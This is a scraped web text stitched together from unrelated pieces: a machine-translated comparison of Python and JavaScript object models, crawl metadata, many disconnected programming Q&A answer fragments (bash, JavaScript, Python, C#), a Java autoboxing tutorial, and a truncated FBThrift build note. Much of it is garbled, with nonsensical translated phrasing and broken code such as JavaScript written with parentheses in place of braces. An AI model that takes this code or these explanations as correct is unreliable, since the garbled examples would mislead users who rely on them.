python structural body (including class, function and class instances) and the javascript of the structure (Object and function) to achieve somewhat similar, but also somewhat different.
python the class of data and functions around the store are Victoria __dict__.
Object property and method exist inside.
The javascript object (Object or function) should have two hash stored data, a prototype, one is xxx (now do not know what, storage object's own methods and data). Data and methods is also of mixed storage.
Examples of methods for target search, the two, is almost the same.
python Medium:
class Dog ():
def spark (self):
print "spark"
dog = Dog ()
dog.spark () # output spark
Medium dog.__dict__ nothing, when dog.spark called, python first dog__dict__ find spark, if not, from the class Dog Medium __dict__ search.
class dict not copy the function to the instance in the go.
The javascript:
function Dog () ()
Dog.prototype.spark = function () (alert ( 'spark');)
dog = new Dog ();
dog.spark (); # output spark
If the modified method of class Dog dog will affect the solution?
Dog.prototype.spark = function () (alert ( 'spark2');)
dog.spark () # output spark2
Changed.
So javascript methods like retrieval and python.
python and javascript feel like,
From the python's class and function definitions, key: value, can be seen, python is the core of dict.
The javascript is the prototype of a dict.
Their methods and data are stored mixed. Without "()" is the method itself, added a "()" method is called.
This way of implementation of the ruby is not the same.
Since ruby is a pure OO husband, a distinction between the internal member variables and methods, so the storage is separate from the iv_table and m_table.
And class instantiation process, and also a bit like javascript.
javascript defined in the prototype is equivalent to ruby in the Ways instance_methods. There are things that can be retrieved at function scope. The difference is, js is a function of the copy. Medium ruby in the class is only preserved example of a class of indicators point to k_class.
js and ruby are the function of the class divided into two parts, instance_methods (prototype) and class methods (Object-private methods)
|
http://www.quweiji.com/python-vs-javascript/
|
CC-MAIN-2018-43
|
refinedweb
| 357
| 76.32
|
Oops, I'm not going to kick you. This is the second part of my last post about wrapper classes. In this post I'm gonna talk about boxing.
Auto boxing
All these features are introduced after Java version 5. In previous post we saw how to convert primitives into wrapper objects. After Java version 5 it gives us an automatic conversion of primitive data types into its equivalent wrapper object.
Look at this code.
public class Autoboxing { public static void main(String[] args) { //Before Java5 Integer x1 = new Integer(100); //Wrap int y1 = x1.intValue(); //Unwrap y1++; //Use x1 = new Integer(y1); //Re-wrap //After Java 5 Integer x2 = new Integer(100); //Wrap x2++; //Unwrap-> Use -> Re-wrap System.out.println("Before Java 5: " + y1); System.out.println("After Java 5: " + x2); } }So now you can see after Java 5, it is very easy to use wrapper objects in your programs.
==, != and equals()
In previous post I used == to check equality of wrapper objects. Here there is a simple code about all three things.
public class BoxingTest { public static void main(String args[]){ Integer i1 = 127; Integer i2 = 127; if(i1 != i2){ System.out.println("i1 != i2"); } if(i1 == i2){ System.out.println("i1 == i2"); } if(i1.equals(i2)){ System.out.println("i1.equals(i2)"); } } }
When you run this program you can see the output as follows.
i1 == i2
i1.equals(i2)
Then lets look at following program.
public class BoxingTest { public static void main(String args[]){ Integer i1 = 128; Integer i2 = 128; if(i1 != i2){ System.out.println("i1 != i2"); } if(i1 == i2){ System.out.println("i1 == i2"); } if(i1.equals(i2)){ System.out.println("i1.equals(i2)"); } } }In this program I have changed one thing, 127 to 128. When you run this program you can see the output as follows and you may get confuse of that result. But don't confuse.
i1 != i2
i1.equals(i2)
You can see i1.equals(i2) is common output for these two programs. It means the equal method is looking for meaningful equality. But when I changed 127 to 128, it gives chaotic results, once i1 != i2 and then i1 == i2.
There is the answer for the question running in your mind. Java is doing this to save memory avoid creating unnecessary objects when programming. Java says if there are following wrapper objects will always be same(==) when their primitive values are the same. There is the list.
Boolean
Byte
Byte
Character ( \u0000 to \u007f )
Short ( -128 to 127 )
Integer ( -128 to 127 )
What will happen Primitive == Wrapper ?
First of all try this program and find the result.
You can see the output as "i1 == i2". In this program, the wrapper object that you used is automatically converted to primitive. Then it checks the comparison between primitive and primitive.
public class EqualTest { public static void main(String[] args) { Integer i1 = 100; int i2 = 100; if(i1 == i2){ System.out.println("i1 == i2"); } else{ System.out.println("i1 != i2"); } } }
You can see the output as "i1 == i2". In this program, the wrapper object that you used is automatically converted to primitive. Then it checks the comparison between primitive and primitive.
Important !
Wrapper reference variable can be null, try this example to see what happen.
public class BoxTest2 { Integer x; public static void main(String[] args) { BoxTest2 obj = new BoxTest2(); display(obj.x); } static void display(int i){ int y = 10; System.out.println(i + y); } }
Boxing with Overloading
This is another use of overloading. You can use boxing with overloading. In this case we consider about three factors that can make overloading.
- Widening
- Auto-boxing
- Var-args
What do you mean by Widening ?
Widening is the method of transforming a data type to a larger data type.
- byte to short / int / long / float / double
- short to int / long / float / double
- int to long / float / double
- long to float / double
- float to double
Widening vs Boxing
Here is a simple program, try it.
public class Boxing1 { public static void main(String args[]){ int i = 10; run(i); } static void run(Long x){ System.out.println("Long"); } static void run(long x){ System.out.println("long"); } }
There you can see the output. It is "long". What about "Long" ? This is the thing behind the boxing with widening. Because JVM thinks that it is easy to widening primitive value than perform a boxing execution. So now Widening beats Boxing. Widening wins.
Old vs New ( Widening vs Var-args )
public class Boxing2 { public static void main(String args[]){ int i = 10; calc(i,i); } static void calc(int x, int y){ System.out.println("OLD"); } static void calc(int...x){ System.out.println("NEW"); } }
Var-args is a new thing in Java that is introduced after Java version 5. Click here to see the post about Var-args. Click here to go to Var-args in Java. In this kind of case compiler will choose older style first and then newer style. Then you can see Widening beats var-args.
Boxing vs Var-args
You saw widening vs boxing and widening vs var-args. Then you may think about the result of boxing vs var-args. Try this program and then you will able to see var-args is the looser.
public class Boxing3 { public static void main(String args[]){ int i = 100; run(i,i); } static void run(Integer x, Integer y){ System.out.println("boxing"); } static void run(int...x){ System.out.println("var-args"); } }
Widening reference variables
I think you can remember about Inheritance and IS-A relationships( Click here to go to OOP post ). There is a simple example and you can see the relationship between inheritance and widening.
class Fruit{ static void eat(){ System.out.println("This is the eat method in Fruit calss"); } } public class Apple extends Fruit { public static void main(String[] args) { Apple obj = new Apple(); obj.drink(obj); obj.eat(); } static void drink(Fruit a){ System.out.println("This is the eat method in Apple class"); } }
You can see that the drink( ) method needs Fruit parent and drink( ) method is in the Apple child class. It means Apple IS-A Fruit. In this example the compiler widening the Apple reference to Fruit. This widening is depend on inheritance. If there are IS-A relationship, it can be used widening. But you cannot widen one wrapper class to another one. Look at the following example.
public class Boxing5 { public static void main(String args[]){ Boxing5 b = new Boxing5(); b.go(new Integer(10)); } void go(Double d){ } }
In this example you can see an error in Eclipse like this.
Overloading with Widening and many Var-args
In previous examples you saw this thing with only one Var-arg. In this section it is about many var-args. Try this example to understand.
public class Boxing6 { public static void main(String args[]){ Boxing6 obj = new Boxing6(); int x = 10; obj.wide(x,x); obj.box(x,x); } void wide(long...i){ System.out.println("long"); } void box(Integer...I){ System.out.println("Integer"); } }
This will compile well and run. You can change data types and Wrapper objects I have used in this example. Then you can see the possibilities of using many var-args with widening. You need to understand that you can combine var-args with either Widening or Boxing.
Auto-boxing and Unboxing
Reviewed by Ravi Yasas
on
8:04 AM
Rating:
|
https://www.javafoundation.xyz/2014/01/auto-boxing-and-unboxing.html
|
CC-MAIN-2021-43
|
refinedweb
| 1,236
| 68.77
|
django-template-fragments 0.1.3
helper for templates used in javascript client framework: allow to store small django templates in a dir and generate a javascript object that contains them all as strings# Introduction
Often,
From pip:
pip install django-template-fragments
From setup.py:
git clone git://github.com/Psycojoker/django-template-fragments.git
cd django-template-fragments
python setup.py install
Create a dir where you want to store your fragments, then add `FRAGMENTS_DIR` to your `settings.py`, it must be an absolute path.
I like to define my `FRAGMENTS_DIR` like this:
import os
PROJECT`
url(r'^', include('fragments.urls')),
And somewhere in your base template
<script type="text/javascript" src="{% url fragments %}"/>
This will give you a javascript object `fragments` containing all your fragments, the key is the filename of the fragment without the extension.
Example: `object_list.html` will be accessible in the `fragments` object like this: `fragments.object_list`
If
If you have [HamlPy] installed and that your fragment name ends with `.haml`, django-template-fragments will take it into account and use HamlPy to generate the html.
# Verbatim tag
**You
By default `django-template-fragments` ignores every files that ends with one of those: `.pyc` `.swo` `.swp` `~`
You can specify your own list by defining `FRAGMENTS_IGNORED_FILE_TYPES` in your `settings.py`.
- Downloads (All Versions):
- 16 downloads in the last day
- 53 downloads in the last week
- 244 downloads in the last month
- Author: Laurent Peuch
- License: MIT
- Package Index Owner: psycojoker
- DOAP record: django-template-fragments-0.1.3.xml
|
https://pypi.python.org/pypi/django-template-fragments/0.1.3
|
CC-MAIN-2015-18
|
refinedweb
| 254
| 54.42
|
Installation and Configuration of HashiCorp Vault on AKS .
This article focuses on deployment and configuration of HashiCorp Vault on AKS and use the secret values as ENV variables in pod.
Prerequisite: Helm, Kubernetes, yaml.
1: Install the Vault Helm chart
1.1: Add the HashiCorp Helm repository using following command.
helm repo add hashicorp
1.2: Update all the helm repositories.
helm repo update
1.3: Pull the vault helm chart in your local machine using following command.
helm pull hashicorp/vault --untar
1.4: Now open the values.yaml file and do the changes according to your need.
I am gonna enable UI mode and its service type as LoadBalancer to access the Web UI of Vault as shown below.
1.5: Create a namespace ‘vault’ and install the vault helm chart in that namespace using following commands.
kubectl create ns vaulthelm install vault . -f values.yaml -n vault
1.6: Get all the pods within the vault namespace.
kubectl get pods -n vault
The
vault-0 pod deployed runs a Vault server and reports that it is
Running but that it is not ready (
0/1). This is because the status check defined in a readinessProbe returns a non-zero exit code.
2: Initialize and unseal Vault
Vault starts uninitialized and in the sealed state. The process of initializing and unsealing Vault can be performed via the exposed Web UI.
2.1: Get the external IP of the vault-ui service, launch the web browser and enter the EXTERNAL-IP with the port
8200 in the address. For example:
2.2: Enter
5 in the Key shares and
3 in the Key threshold text fields.
2.3: Click Initialize.
2.4: When the root token and unseal key is presented, scroll down to the bottom and select Download keys. Save the generated unseal keys file to your computer.
2.5: Click Continue to Unseal to proceed and open the downloaded file.
2.6:.
2.7: Copy the
root_token and enter its value in the Token field. Click Sign In.
3: Set a secret in Vault
3.1: Select the Secrets tab in the Vault UI. Under Secrets Engines, select Enable new engine.
3.2: Under Enable a Secrets Engine, select KV and Next.
3.3: Enter
secret in the Path text field and select Enable Engine.
3.4: Now create a secret as shown below as per your need.
Enter
microservices/service-name in the Path for this secret.
Select Add to create another key and value field in Version data.
Select Save to create the secret.
4: Configure Kubernetes authentication
Vault provides a Kubernetes authentication method that enables clients to authenticate with a Kubernetes Service Account Token.
4.1: Select the Access tab in the Vault UI. Under Authentication Methods, select Enable new method.
4.2: Under Enable an Authentication Method, select Kubernetes and Next.
Select Enable Method to create this authentication method with the default method options configuration.
The view displays the configuration settings that enable the auth method to communicate with the Kubernetes cluster. The Kubernetes host, CA Certificate, and Token Reviewer JWT require configuration. These values are defined on the
vault-0 pod.
4.3: Enter the address returned from the following command in Kubernetes host field.
echo " kubectl exec vault-0 -n vault -- env | grep KUBERNETES_PORT_443_TCP_ADDR | cut -f2 -d'='):443"
4.4: For the Kubernetes CA Certificate field, toggle the Enter as text. Enter the certificate returned from the following command in Kubernetes CA Certificate entered as text.
kubectl exec vault-0 -n vault -- cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
4.5: Expand the Kubernetes Options section. Enter the token returned from the following command in Token Reviewer JWT field.
echo $(kubectl exec vault-0 -n vault -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
4.6: Select Save.
5: Configure Micro-service authentication
5.1: Select the Policies tab in the Vault UI. Under ACL Policies, select the Create ACL policy action.
5.2: Enter
microservices in the Name field.
5.3: Enter this policy in the Policy field.
path “secret/data/microservices/*” {
capabilities = [“read”]
}
5.4: Select Create policy.
The policy is assigned to the micro-service through a Kubernetes role. This role also defines the Kubernetes service account and Kubernetes namespace that is allowed to authenticate.
5.5: Under Authentication Methods, click the … for the kubernetes/ auth method. Select View configuration.
5.6: Under the kubernetes method, choose the Roles tab and Select Create role.
5.7: Enter microservices in Name field.
Enter
vault in the Bound service account names field.
Enter
default in the Bound service account namespaces field and select Add.
5.8: Expand the Tokens section.
Enter
microservices in the Generated Token's Policies and select save.
6: Deploy application
6.1: Define a Kubernetes service account named
vault as shown below.
cat > sa.yaml <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: vault
EOF
Create the
vault service account using following command.
kubectl apply -f sa.yaml
6.2: Add the highlighted part shown in below image in your k8s deployment file as per your requirements. Using vault.hashicorp.com/agent-inject-template-config annotations, you can use secrets as a ENV variables in pod.
Note: In place of
sleep 1000000 in args, use your own command to start the application.
6.3: Apply the above deployment file and you are done.
|
https://anassolanki.medium.com/installation-and-configuration-of-hashicorp-vault-aks-bdf59a87b8db?source=read_next_recirc---------2---------------------8af3e948_ff1e_412b_9e33_3afb359a9a78-------
|
CC-MAIN-2022-21
|
refinedweb
| 898
| 61.12
|
You can check the error code from commands you run
#!/bin/bash
function test {
"$@"
status=$?
if [ $status -ne 0 ]; then
echo "error with $1"
exit 255
fi
return $status
}
test ls
test ps -ef
test not_a_command
taken from here for more information Bash Beginner Check Exit Status't stop the user from running script, nor can you guarantee that
they will run your script. The browser, and any scripts that run there,
are outside of your control.
Any important security code needs to run on the server - that's where you
need to validate the fields. That's the piece of the system that you
control.
So, some tips for you:
1st. (according to comment)
Add as a first line to your sub: Application.ScreenUpdating = false and add
the other line right before End Sub : Application.ScreenUpdating = true
2nd. Move this line (it's setting constance reference):
Set wb = Workbooks("Equipment Further Documentation List.xls")
before:
Do Until txtStream.AtEndOfStream
3rd is just a tip.
To see the progress of your sub add the following line:
Application.StatusBar = file.Name
after this line:
Workbooks.Open strNextLine & Application.PathSeparator & file.Name
Before the End Sub add additionally this code:
Application.StatusBar = false
As a result you can see in Excel app, in the status bar, file name which is
currently in process.
Keep in mind that working with 500 files mus();
});
});
});
If you have never run the test suite for your current branch, Tddium will
simply pick up the test pattern and use it. If you have already configured
the suite for the current branch, the simplest solution is to run tddium
suite --edit.
we had the same issue on website. It started to happen from yesterday
04/07/2013. It only happens in IE7 browser. We just omitted the browser
from showing the Like box with below code.
if (navigator.appVersion.indexOf("MSIE 7.") == -1) {);
}
You must finish your threads and release every resources when the bundle is
stopping. You can do it for example in the BundleActivator stop method.
In case you have new threads you should also be sure that the threads
finish their job before the stop function returns. This means that if your
jobs need to run for a long time before finish (e.g. due to an iteration)
they should be designed in a way that they can be interrupted.
You could use cwd parameter, to run scriptB in its directory:
import os
from subprocess import check_call
check_call([scriptB], cwd=os.path.dirname(scriptB)) !
If you return false from the submit handler it will cancel the submit
event.
You can change your DateDiff.inDays call to into:
if (!DateDiff.inDays(d2, d1)) {
return false;
}
I found solution. There is an option "allow service to interact with
desktop" in tab "Log On" in service properties. After checking it out, and
restarting Tera Term Works fine. Tera Term window does not apear. Solved!
What about usig nohup?
nohup is a POSIX command to ignore the HUP (hangup) signal. The HUP
(hangup) signal is by convention the way a terminal warns dependent
processes of logout.
As, Omar suggested I want to give an id instead of $(document). Using
pagebeforeshow or pageshow , pagehide and Clearing the interval will solve
this issue. The following code works for me,
var auto_refresh;
$("#light-page").on('pagebeforeshow', function(){
auto_refresh = setInterval(function () {
// code
}, 3000);
});
$('#light-page').on('pagehide', function () {
clearInterval(auto_refresh);
});
Adding id in Html:
<div data-
</div>?
|
http://www.w3hello.com/questions/Best-way-to-stop-a-Python-script-even-if-there-are-Threads-running-in-the-script
|
CC-MAIN-2018-17
|
refinedweb
| 574
| 67.86
|
The use of function statements in JavaScript is discouraged. Check out
Mozilla's page on function scope which has a great section on function
statements vs. function expressions, and states:
Functions can be conditionally defined using either //function
statements// (an allowed extension to the ECMA-262 Edition 3 standard) or
the Function constructor. Please note that such function statements are no
longer allowed in ES5 strict. Additionally, this feature does not work
consistently cross-browser, so you should not rely on it.
The fact that you are seeing differences between browsers with this code is
not surprising.
Try
var tile1 = function () {
...
}
While this should work for you here, it does so only because variable
definitions with var are hoisted. As JavaScript evol
You can use $.off to unbind an event, but I would recommend to just use a
variable to keep track if its been triggered or not.
This snippet will prevent f from being called until the scrolling has been
set to false again.
$(window).scroll(function(){
if(this.scrolling == undefined)
this.scrolling = false;
if(this.scrolling == false){
this.scrolling = true;
f();
}
});
function f(){
//execute code
window.scrolling = false;
}
This is most likely caused because of too strong quoting. This error line
bash: /bin/echo 'hello'; bash -l: No such file or directory
shows that bash does not try to execute the command /bin/echo with the
argument 'hello' followed by the command bash -l. Instead bash is trying to
execute the command /bin/echo 'hello'; bash -l.
Compare:
$ ssh localhost -t "/bin/echo 'foo'; bash -l"
foo
$ logout # this is the new shell
Connection to localhost closed.
and:
$ ssh localhost -t '"/bin/echo 'foo'; bash -l"'
bash: /bin/echo foo; bash -l: No such file or directory
Connection to localhost closed.
The solution to this problem usually involves eval, but I cannot tell for
sure unless I see more code from you.
the first argument of setInterval needs to be a function.
window.setInterval( function() {
$.get(url,function(data) {
if (data.GhStatus == 0) {
$('#GhCsStatus_CS').buttonMarkup({ icon: 'myapp-cs' });
alert('crash');
}
else {
$('#GhCsStatus_GH').buttonMarkup({ icon: 'myapp-gh' });
alert('running');
}
if (data.CsStatus == 0) {
$('#GhCsStatus_CS').buttonMarkup({ icon: 'myapp-cs' });
alert('crash');
}
else {
$('#GhCsStatus_GH').buttonMarkup({ icon: 'myapp-gh' });
alert('running');
}
}, "json") },
I think the problem you are actually facing is not that progress is run
once when the for loop finishes, but that the div where you are trying to
reflect that change is updated only when the windowsFillProcessTable
finishes executing. Since JavaScript is single threaded (for now) the
execution of windowsFillProcessTable blocks every other processing,
including DOM update.
You'll have to find an alternative scheme to make the update to your
progress bar. See this or this for possible options.
In the line of code
canv.tag_bind(obj,'<Double-1>',Yellow())
The expression Yellow() calls the function called Yellow. In order to
simply refer to a function (say to bind it to an event) instead of calling
it, you should just write Yellow. So your code should instead read
canv.tag_bind(obj,'<Double-1>',Yellow)
First of all, I don't see the advantage of declaring the label variable
with global scope in the context of the code you've shared. Since you're
returning a label from the getLabel function then I think you should just
declare var label; at the top of the getLabel function and return the
value of that local variable from the function.
Second, the only way I can see that "undefined" would be returned from
getLabel is if f.attributes.label is undefined. I would try a code block
such as:
} else { // is not cluster
if (f.attributes.label != null && typeof(f.attributes.label !=
"undefined") {
// if (f.attributes.label) { // alternate simpler if statement
label= " " + f.attributes.label;
} else {
label = " ";
}
}
As suggested in my comment you can add a class to the element (eg dragging)
when you start dragging in the start function of the draggable, than check
in the click handler if the element (or the parent of it in your case) have
to class or alternatively fire the function.
Code:
$(document).ready(function () {
$('.container').draggable({
start: function (event, ui) {
$(this).addClass('dragging');
}
});
$('.clickable').click(function (event) {
if ($(this).parent().hasClass('dragging')) {
$(this).parent().removeClass('dragging');
} else {
//alert("real click");
$("#content").toggle();
}
});
});
Maybe there are alternatives to this, but is the only solution that I used.
Demo:
There are two possible asynchronous executions which can get you these
results :
cheerio.load has not finished before createProduct is called.
In createProduct product is not getting populated or partially like
description before callback is called (not sure).
You can use async library to make functions execute synchronously (by using
async.series). If createProduct is asynchronous as well , you will have to
make it synchronous in similar way.
async.series([
function(callback){
$ = cheerio.load(body);
callback();
},
function(callback){
createProduct(obj, function(product){
lookUp(product);
});
callback();
}
]);
Concurrency access to a shared resource is a well known problem. Python
thread provide some mechanism to avoid issues.
Use python locks :
Lock are used to synchronize access to a shared resource :
lock = Lock()
lock.acquire() # will block if lock is already held
... access shared resource
lock.release()
More information :
The switch statement fires for each element of the array. This behavior is
documented (check Get-Help about_Switch):
If the test value is a collection, such as an array, each item in the
collection is evaluated in the order in which it appears.
Use a regular conditional instead (since you have only 2 cases anyway):
if ($attachArray -eq $null) {
Send-MailMessage -SmtpServer "internalrelay.corp.local" `
-From "test@andylab.local" -To $toAddresses `
-Subject "There should really be something more informative here" `
-BodyAsHTML $SCRIPT:htmlBody
} else {
Send-MailMessage -SmtpServer "internalrelay.corp.local" `
-From "test@andylab.local" -To $toAddresses `
-Subject "There should really be something more informative here" `
-BodyAsHTML $SCRIPT:htmlBody
-At
This method is not defined for the Object class in Rhino.
The Rhino documentation states:
Rhino contains
All the features of JavaScript 1.7
The Mozilla JavaScript documentation states Object.keys was:
Introduced in JavaScript 1.8.5
The same Object.keys documentation includes an example of how to add this
to previous version of JavaScript.
Waiting for asynchronous calls, as you're doing here, are designed to not
block any other code that you're running. So the each loop will loop
regardless of a response. So your solution is a different pattern.
First save your jQuery objects in an array
var user_checkboxes = [];
user_checkboxes = $('#users input:checkbox');
And then only submit the user at index 0 first.
function submitPost(){
if(user_checkboxes.length === 0) return;
var user = user_checkboxes[0];
var a = (user.is(':checked')) ? user.val() : "");
if (a != ""){
postToPage(a) // a = PageId|AccessToken
<option>PageId|AccessToken</option>
}
}
In your response from the Ajax call you can do this
FB.api('/' + d, { fields: 'access_token'}, function (b) {
if (dataSepra
I have checked the link. Use the 'keyup' event. It works. This is due to
when you use the keydown or keypress event then the event function runs
before the value of the input tag is updated because it is keydown. If you
try the code by pressing the key for sometime then you will see the
function runs immediately. But on keyup the function will run after the key
is released and updated therefore.
The method in main class call doesn't return correct result for bool
a1 and a2.
Maybe you checked your boolean variable on the line before calling the
CompareMyValue-Function?
I tested your code in a sample project and it worked fine for me:
bool a1 = _check.CompareMyValue(1, 1);
System.Diagnostics.Debug.Print(a1.ToString()); // prints true
bool a2 = _check2.CompareMyValue("xyz", "xyz");
System.Diagnostics.Debug.Print(a2.ToString()); // prints true
bool a3 = _check2.CompareMyValue("x", "y"); // another example
System.Diagnostics.Debug.Print(a3.ToString()); // prints false
$_COOKIE is created before your code is processed just like $_POST and
$_GET. If you initiate the cookie after page load it will be empty. What
you can do is this:
$cookie = functionX('random');
function functionX($key) {
if(isset($_COOKIE['cookie'][$key]) {
return $_COOKIE['cookie'][$key];
} else {
$randomvar = 'whatever';
setcookie("cookie[$key]", $randomvar, time()+60*60*24*30, "/",
"", 0, true);
return $randomvar;
}
}
Skip.addEventListener('click', reloadPage(), true);
// ^^-------------------
Should be:
Skip.addEventListener('click', reloadPage, true);
You want the callback to be reloadPage not what reloadPage returns.
You can use ecmaScript5 bind function, to bind the context and set the
arguments to be passed in.
image[i].onmousedown = whatever.bind(this, name, what, when, where, how );
this here will be the current context where you are binding the event. If
you want to get the context of the element itself then:
image[i].onmousedown = whatever.bind(image[i], name, what, when, where, how
);
As mentioned in MDN you can place this script in your js for older browser
support.
if (!Function.prototype.bind) {
Function.prototype.bind = function (oThis) {
if (typeof this !== "function") {
// closest thing possible to the ECMAScript 5 internal IsCallable
function
throw new TypeError("Function.prototype.bind - what is trying to be
bound is not callable");
}
var aArgs = Arr
I would check the return value of malloc() and use perror() to describe
what error has occured. Also here is the documentation for malloc() and
perror().
if((product = (MONOM*)malloc(phSize*sizeof(MONOM))) == NULL)
{
perror("ERROR: Failed to malloc ");
return 1;
//perror() will display a system specified string to describe the
error it may tell you the error
}
Also do you know the size of MONOM? If not add the following line to your
code.
printf("MONOM SIZE = %i
", sizeof(MONOM));
The problem is that you aren't specifying POST as the method in your form,
but you are trying to read the form variables from the $_POST variable.
See this thread: What is the default form posting method? for information
about the form defaults. To fix it, you just need to change your form to
this:
<form action='projectadded.php' name="addnewproject"
onsubmit="return(validate());" method="POST">
There are some other things you should change in here, like sanitizing your
inputs before putting them into the database, but those aren't the root of
your problem.
Some errors I see (my apologies if they're already in your code):
Your variable target_card only holds the value of the card, not the suit.
You may need to parse the full card in two, since those include both a suit
and a value
That's not a proper use of the del command; you don't need to set it equal
to anything or test for an equality.
It would also be helpful to post what errors you got, to help us
troubleshoot.
Also, I don't think this is how Go Fish is played..
Well, Test Results window is dropped in VS2012#.
It sounds like you are using progress reporter (which does rewrite the
terminal output) and the output is clobbered with log or something. Try
using --reporters dots on Travis.
This might be done in a lot of ways, here's just my first idea:
Use a mask like this:
Make sure your background-image covers the whole button
Insert two white divs above the background-image: left & right of your
button
Insert a Mask like the above as the buttons background
Due to the transparent area (indicated by the texture) you are able to
display a border-like part of your background image while the rest of it
stays invisible, because its overlapped.
I illustrated the result of the instructions above
It's a weird behavior, the class files should know where the javadoc is
after you added it for the first time.
Are you using a simple Java project? What you could do is make a lib folder
in your project, copy the JARs and source there, and then add them to the
build path.
As much as possible , try avoiding external dependencies. You never know
when they'll just be gone from where they were.
This was all my fault. App1 does not support iCloud. App2 does. My goof was
the following. I had enabled iCloud on my Mac but not on the VMWare virtual
machine. Like any physical machine I needed to turn on iCloud on in the
Settings of the OS X virtual machine.
Mark
Try this, it will solve your problem
$(function() {
$("#mission").hover(function () {
$(".to-be-hidden").each(function( index ) {
$(this).stop().animate({opacity: 0.5}, "slow");
$('#feat-hover').stop().animate({'opacity': '1.0'}, "slow");
});},
function () {
$(".to-be-hidden").each(function( index ) {
$(this).stop().animate({opacity: 1.0}, "slow");
$('#feat-hover').stop().animate({'opacity': '0'}, "slow");
});
});
});
Per the jQuery documentation for the dblclick event:.
You want to change your events so that you don't have a .click and
.dblclick on the same element.
You have code like this:
if A
if B
else C
That else applies to the if B, NOT the if A.
I think you meant this:
if A
elseif B
else C
Conditional Comments. There are some other alternatives but conditional
This is due to the behaviour of floating point arithmetic. Which is
explained in this question. The opacity is never actually reaching 0, so
the timer is never cleared.
The solution is to use toFixed(1) when you are performing your subtraction
and addition:
var timer = setInterval(function (){
el.style.opacity = (el.style.opacity - 0.1).toFixed(1);
if (el.style.opacity == 0) {
clearInterval(timer);
}
}, 40);
JSfiddle example is here:
Don't try to rewrite the whole multiprocessing library again. I think you
can use any of multiprocessing.Pool methods depending on your needs - if
this is a batch job you can even use the synchronous
multiprocessing.Pool.map() - only instead of pushing to input queue, you
need to write a generator that yields input to the threads.
When the map function generate the intermediate result and first sent them
to buffer, the partitioning and sorting will start and , if a combiner is
specified, it will be invoked at this time. This process is in parallel
with the map function. When map function finishes, all the spills on disk
will be merged, and combiners will also be invoked at this time too.
The buffer threshold is limited by io.sort.spill.percent, during which
spills are created. If the number of spills is more than
min.num.spills.for.combine, combiner gets invoked on the spills created
before writing to disk.
So to answer your question: you are right it is the choice a) .
Ref : This mail thread.
Assuming that you mean the title element within head, one option, if you
can, would be to use JavaScript.
// set current title to foo
document.title = 'foo';
try this its works perfect
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package com.java.util.test;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.HashMap;
import javax.swing.JFrame;
/**
*
* @author shreyansh.jogi
*/
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.*;
public class JavaApplication2 extends JFrame implements ActionListener {
/**
*
*/
private static final long serialVersionUID = 1L;
JButton num1, num2, num3, num4, num5, num6, num7, num8, num9, num0,
add, sub, div, mult, equalto, exit, point, reset;
JTextField txtfld;
String s = "", ope = "";
int flag = 0;
double total1;
double
You can use a combination of itertools.groupby and collections.Counter:
>>> from itertools import groupby
>>> from collections import Counter
>>>>> Counter(k for k, g in groupby(strs))
Counter({'T': 5, 'H': 4})
itertools.groupby groups the item based on a key.(by default key is the
items in the iterable itself)
>>> from pprint import pprint
>>> pprint([(k, list(g)) for k, g in groupby(strs)])
[('T', ['T', 'T']),
('H', ['H', 'H']),
('T', ['T']),
('H', ['H', 'H']),
('T', ['T']),
('H', ['H', 'H', 'H', 'H']),
('T', ['T', 'T']),
('H', ['H', 'H', 'H']),
('T', ['T', 'T', 'T'])]
Here first item is the key(k) based on which the items were grouped and
list(g) is the group related to that key. As we're
A cleaner solution (if I understood the problem correctly) would be to
simply ignore lines that contain the same text as the previous one after
"You're currently in: ". You are interested in the timestamp of the last
line that wasn't ignored under this condition.
ignore_if_equal_to = None
with open(file_location) as file_object:
for each_line in file_object:
if "You're currently in: " in each_line:
trail = each_line.split("You're currently in: ")[1:]
if trail == ignore_if_equal_to:
continue
recent_statement = eachLine
ignore_if_equal_to = trail
print recent_statement
Assuming you refer to a BroadcastReceiver. You can use the same intent
filters to launch an activity, service or even a single BroadcastReceiver
in the manifest like this:
<receiver android:
<intent-filter>
<action android:
</intent-filter>
</receiver>
this example is for a BroadcastReceiver. Also, can you post your code?
Here is a nice tutorial about BroadcastReceivers: vogella
articles-AndroidBroadcastReceiver
You make two requests. One by calling builder.sendRequest(null, new
RequestCallback()
and the other in the callback with status 200 Window.Location.replace(link)
Btw i hope this isnt a code that will be deployed.
Not handled exceptions
Database operations should be done in an own layer
I cant see any code convention
You should only select the columns u realy need
Unnecessary declarations
There are many other points, but you should fix this at first and then u
will be able to find errors and maintain the code by yourself
|
http://www.w3hello.com/questions/-ASP-NET-function-runs-twice-
|
CC-MAIN-2018-17
|
refinedweb
| 2,891
| 57.37
|
Language management
Asked by ntrubert-cobweb on 2010-08-24
As there are Magento Meta Information by product and translation available, is there possibility to synchronize translation between Openerp and Magento?
If yes is it by shop relation ?
One language one shop ?
Question information
- Language:
- English Edit question
- Status:
- Solved
- Assignee:
- No assignee Edit question
- Solved by:
- ntrubert-cobweb
- Solved:
- 2010-08-25
- Last query:
- 2010-08-25
- Last reply:
-
blueprints already exists sorry for that.
We totaly can manage the langage when we export product from openerp to magento.
You just have to select the correct langage in OpenERP for each storeview. (You can do it from the shop view.)
Also you have select the default langage of your magento instance from the menu magento instance.
Importing product from magento to openerp in multi langage is not posible right now, If your are interested by this functionality, you can contact us.
Regards
The answer is no, "Magento Open ERP Connector" is not ready yet to manage language import export.
base_external referentials call magento API without store_view parameter
def ext_create(self, cr, uid, data, conn, method, oe_id, context):
return conn.call(method, data , <we have to add store_view code here according to the language context>)
def try_ext_
update( self, cr, uid, data, conn, method, oe_id, external_id, ir_model_data_id, create_method, context):
return conn.call(method, [external_id, data], <we have to add store_view code here according to the language context>)
I gonna add blueprints
|
https://answers.launchpad.net/magentoerpconnect/+question/122562
|
CC-MAIN-2020-10
|
refinedweb
| 241
| 53.71
|
Basic.
Build FBThrift
FBThrift source can be obtained from their github page. Installing procedure is typical and relatively straight forward. One catch was that the README did not mention rsocket-cpp in dependencies but that is needed as well. (If you encounter ‘internal compiler error: cpp1ypl’ when building rsocket-cpp, try to run make without
-j).
After successfully building FBThrift, the thrift compiler is built to
